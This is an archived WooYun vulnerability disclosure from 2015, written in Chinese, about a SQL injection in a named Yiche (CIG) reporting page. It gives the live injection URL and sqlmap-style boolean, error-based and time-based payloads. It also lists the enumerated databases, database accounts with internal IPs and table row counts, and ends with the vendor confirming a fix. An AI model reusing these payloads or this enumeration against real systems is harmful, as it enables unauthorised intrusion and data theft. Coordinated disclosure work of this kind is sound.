乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-22: 细节已通知厂商并且等待厂商处理中 2015-02-22: 厂商已经确认,细节仅向厂商公开 2015-03-04: 细节向核心白帽子及相关领域专家公开 2015-03-14: 细节向普通白帽子公开 2015-03-24: 细节向实习白帽子公开 2015-04-13: 细节向公众公开
恭喜发财,红包拿来
注入点:http://dmp.op.cig.com.cn/report/area/index?t=1&deep=参数:t=1
---Parameter: t (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: t=1' AND 4647=4647 AND 'cPDg'='cPDg&deep= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: t=1' AND (SELECT 9734 FROM(SELECT COUNT(*),CONCAT(0x716a6b6271,(SELECT (CASE WHEN (9734=9734) THEN 1 ELSE 0 END)),0x717a6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'khji'='khji&deep= Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: t=1' AND SLEEP(5) AND 'buEq'='buEq&deep=---web application technology: Apacheback-end DBMS: MySQL 5.0available databases [66]:[*] bitauto_data_stat[*] bitsmart[*] carsv2222[*] cheyisou[*] cig_achievement[*] cig_ad_sys_t[*] cig_adsense[*] cig_adsense_report[*] cig_audience_package[*] cig_blog_department[*] cig_blog_easyad[*] cig_crm[*] cig_crmv2[*] cig_institution[*] cig_jiesuan[*] cig_luxgen[*] cig_mrm[*] cig_mst[*] cig_op[*] cig_opv2[*] cig_survey[*] cig_tracking_report[*] cig_urlanalytic[*] cigdc_attribute[*] cigdc_buffer[*] cigdc_dealer[*] cigdc_logmanage[*] cigdc_monitor[*] cigdc_page[*] cigdc_pool[*] cigdc_private_package[*] cigdc_report[*] cigdc_server[*] cigdc_system[*] cigdc_tagmanager[*] cigdc_tagmanager_report[*] cigdc_tagmanager_url[*] cigdc_tagmanager_url_result[*] cigdc_task[*] cigdc_yiche[*] cigdc_yiche_tuisong[*] diamond[*] diamond-production[*] easyad_buffer[*] easyad_mattar[*] easyad_monitor[*] easyad_report[*] easyad_system[*] easyad_task[*] iBitAutotemp[*] information_schema[*] innodb[*] mysql[*] performance_schema[*] test[*] testdb[*] visitor_bqcx[*] web_db[*] yiche_ad_sys[*] yiche_ad_sys_t[*] yiche_auto_index[*] yiche_dad[*] yiche_dad_report[*] yiche_dad_t[*] yiche_domainuser[*] yiche_tag
[*] ''@'AD_DB01'[*] ''@'localhost'[*] 'audience_package'@'%'[*] 'auto_index_car'@'%'[*] 'auto_index_data'@'%'[*] 'auto_index_web'@'%'[*] 'bitsmart'@'%'[*] 'cig_ad_sys_t'@'%'[*] 'cig_adsense'@'%'[*] 'cig_adsense_car'@'%'[*] 'cig_adsense_repo'@'%'[*] 'cig_crmv2'@'%'[*] 'cigdc_logmanage'@'%'[*] 'cigdc_server'@'%'[*] 'cigdc_tagmanager'@'%'[*] 'cigdc_task'@'%'[*] 'cigdc_yiche'@'%'[*] 'cigdc_yiche_api'@'%'[*] 'dad_manager'@'%'[*] 'dad_report_web'@'%'[*] 'dad_test'@'%'[*] 'easyad_system'@'%'[*] 'easyad_xiaol'@'%'[*] 'mlmuser'@'%'[*] 'opv2'@'%'[*] 'private_package'@'%'[*] 'Repluser'@'%'[*] 'root'@'127.0.0.1'[*] 'root'@'192.168.1.141'[*] 'root'@'::1'[*] 'root'@'AD_DB01'[*] 'root'@'localhost'[*] 'user_cig_opv2'@'%'[*] 'user_easyad_syst'@'%'[*] 'web_db'@'192.168.1.141'[*] 'yiche_ad_sys'@'%'[*] 'yiche_ad_sys_t'@'%'[*] 'yiche_dad_report'@'%'[*] 'yiche_tag'@'%'
Database: cigdc_yiche+-------------------------+---------+| Table | Entries |+-------------------------+---------+| StyleD | 3864110 || StylePropertyValue | 3725077 || StyleJoinColor | 96574 || entitylogitem | 88680 || dealer | 53512 || dealerMap | 42141 || dealerBrand | 41561 || Style | 36029 || Style2 | 36029 || a_style_to_model | 35728 || tbl | 34109 || WhiteCoverImages | 19194 || ModelColor | 12132 || yearpropertyvalue | 7588 || Model | 2599 || a_model_to_brand | 2582 || a_model_to_make | 2582 || cx_model | 1947 || area | 1891 || ModelAutohome | 1631 || yichebaa_brandforumlist | 852 || cx_make | 639 || StyleProperty | 420 || cx_masterbrand | 397 || Make | 293 || a_make_to_brand | 287 || tag_tree | 264 || MasterBrand | 254 || Manufacturer | 241 || temp | 53 || StylePropertyGroup | 31 || cx_url_rule | 24 || ModelLevel | 19 || Country | 15 || tag_path | 14 || yichebaa | 13 || emaillogreceiver | 11 || path_car | 11 || `Use` | 10 || ModelBodyForm | 10 || SyncDataReceiver | 4 |+-------------------------+---------+
你懂的
危害等级:高
漏洞Rank:15
确认时间:2015-02-22 17:09
非常感谢对易车的帮助,我们会尽快处理
2015-03-02:
2015-03-02:已经修复,非常感谢对易车的支持